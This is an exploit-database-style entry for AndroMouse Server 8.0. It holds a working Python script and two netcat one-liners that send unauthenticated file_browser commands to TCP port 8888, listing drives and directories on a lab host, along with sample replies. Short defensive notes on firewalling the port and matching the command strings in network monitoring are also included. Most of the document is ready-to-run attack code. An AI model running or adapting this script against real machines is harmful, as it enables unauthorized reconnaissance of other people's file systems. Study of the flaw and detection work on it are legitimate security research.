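# Exploit Title: AndroMouse Server 8.0 – Unauthenticated Directory Enumeration
# Date: 03/07/25
# Exploit Author: Chokri Hammedi
# Vendor Homepage: http://andromouse.com
# Software Link: https://andromouse-server.en.lo4d.com/windows
# Version: 8.0
# Tested on: Windows 10

r'''
Description:
AndroMouse Server 8.0 exposes an unauthenticated TCP command interface on port 8888.
A remote attacker can send crafted commands such as file_browser_root and file_browser|
to enumerate the contents of arbitrary directories on the host file system,
without user interaction or authentication.

POC 1:

echo -e "file_browser_root\n" | nc 192.168.8.104 8888
file_browser_root|C:\|F:\

POC 2:

echo -e "file_browser|C:\Users\public\\n" | nc 192.168.8.104 8888

file_browser | C:\Users\public | | |Documents|Downloads|Music|Pictures|Videos
'''

# Reviewer notes (defensive):
# - The exposure is the listener on port 8888: the commands are plain text and
#   the server answers without asking for any credential.
# - Reachability is the practical control: limit port 8888 (TCP, and the UDP
#   discovery datagram this script sends to the same port) to trusted hosts
#   with the host firewall, and stop the server when it is not in use.
# - The literal strings "file_browser_root" and "file_browser|" arriving on
#   port 8888 are a usable match for network monitoring.

import socket
import time

try:
    import readline
except ImportError:
    try:
        import pyreadline as readline
    except ImportError:
        # Line editing is optional; the menu works without it.
        readline = None

# Lab host used in the write-up; the same address appears in the PoC commands.
TARGET_IP = "192.168.8.104"
UDP_PORT = 8888
TCP_PORT = 8888
NEWLINE = b"\x0a"


def _close_quietly(sock):
    """Close *sock*, ignoring the OSError a dead socket may raise."""
    try:
        sock.close()
    except OSError:
        pass


def establish_udp_connection():
    """Send the ``connection_detect_server`` datagram twice, one second apart.

    UDP is connectionless, so nothing is "established" here and no reply is
    read; the datagrams are simply sent before each TCP attempt.
    NOTE(review): presumably the server's discovery handshake; the page does
    not document it.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        for _ in range(2):
            sock.sendto(b"connection_detect_server" + NEWLINE, (TARGET_IP, UDP_PORT))
            time.sleep(1)


def tcp_connect():
    """Return a TCP socket connected to the server, retrying until it succeeds.

    Each failed attempt is reported, followed by a 3 second pause and a fresh
    UDP discovery message. The returned socket has a 10 second timeout.
    """
    while True:
        sock = None
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(10)
            sock.connect((TARGET_IP, TCP_PORT))
            return sock
        except Exception as e:
            # Release the half-open socket; the retry loop would otherwise
            # leak one descriptor per failed attempt.
            if sock is not None:
                _close_quietly(sock)
            print(f"[!] TCP connection failed: {e}. Retrying in 3s...")
            time.sleep(3)
            establish_udp_connection()


def send_command(sock, command):
    """Send one newline-terminated command and return the decoded reply.

    Socket errors (``socket.timeout``, ``ConnectionError``, ``OSError``)
    propagate to the caller, which handles reconnection.
    """
    sock.sendall(command.encode() + NEWLINE)
    time.sleep(0.5)
    # A single recv() of up to 4096 bytes is treated as the whole reply, so a
    # longer listing would be cut off.
    return sock.recv(4096).decode(errors="ignore").strip()


def list_drives(sock):
    """Request the drive list, print it, and return the drives as strings.

    Returns an empty list when the reply lacks the ``file_browser_root|``
    marker.
    """
    response = send_command(sock, "file_browser_root")
    if "file_browser_root|" not in response:
        print("No drives found")
        return []

    drives = [d.strip() for d in response.split("|")[1:] if d.strip()]
    print("\nAvailable Drives:")
    for drive in drives:
        # The sample reply already ends each drive with a backslash ("C:\"),
        # so normalise before printing instead of appending a second one.
        print(f" {drive.rstrip(chr(92))}\\")
    return drives


def list_directory(sock, path):
    """Request the listing of *path*, print it, and return folders then files.

    Returns an empty list when the reply lacks the ``file_browser |`` marker
    or has fewer than four ``|``-separated fields.
    """
    response = send_command(sock, f"file_browser|{path}")
    if "file_browser |" in response:
        parts = [p.strip() for p in response.split("|")]
        if len(parts) >= 4:
            current_path = parts[1]
            entries = [item for item in parts[3:] if item.strip()]

            folders = []
            files = []
            for entry in entries:
                # Heuristic only: a dot in the last path component is taken to
                # mean "file", so dotted folder names and extension-less files
                # are misclassified.
                if '.' in entry.split('\\')[-1]:
                    files.append(entry)
                else:
                    folders.append(entry)

            print(f"\nContents of {current_path}\n")
            for folder in folders:
                print(f" {folder}")
            for file in files:
                print(f" {file}")
            print(f"\nTotal: {len(files)} files, {len(folders)} directories")
            return folders + files

    print("Directory not found or access denied")
    return []


def interactive_shell():
    """Run the three-option menu (list drives, browse directory, exit).

    A socket error triggers a reconnect; any other exception ends the session.
    The socket is closed on every exit path, including Ctrl-C.
    """
    establish_udp_connection()
    sock = tcp_connect()

    if readline:
        readline.parse_and_bind("tab: complete")
        readline.parse_and_bind("set editing-mode emacs")
        readline.parse_and_bind("set history-preserve-point on")

    try:
        while True:
            try:
                print("\n1. List drives\n2. Browse directory\n3. Exit")
                choice = input("> ").strip()
                if readline and choice:
                    readline.add_history(choice)

                if choice == "1":
                    list_drives(sock)
                elif choice == "2":
                    path = input("Enter path (e.g. C:\\): ").strip()
                    if path:
                        if not path.endswith("\\"):
                            path += "\\"
                        list_directory(sock, path)
                elif choice == "3":
                    break
            except (socket.timeout, ConnectionError, OSError) as e:
                print(f"[!] Connection lost: {e}. Reconnecting...")
                _close_quietly(sock)
                establish_udp_connection()
                sock = tcp_connect()
            except Exception as e:
                print(f"[!] Unexpected error: {e}")
                break
    finally:
        _close_quietly(sock)

    print("[✓] Session ended.")


if __name__ == "__main__":
    interactive_shell()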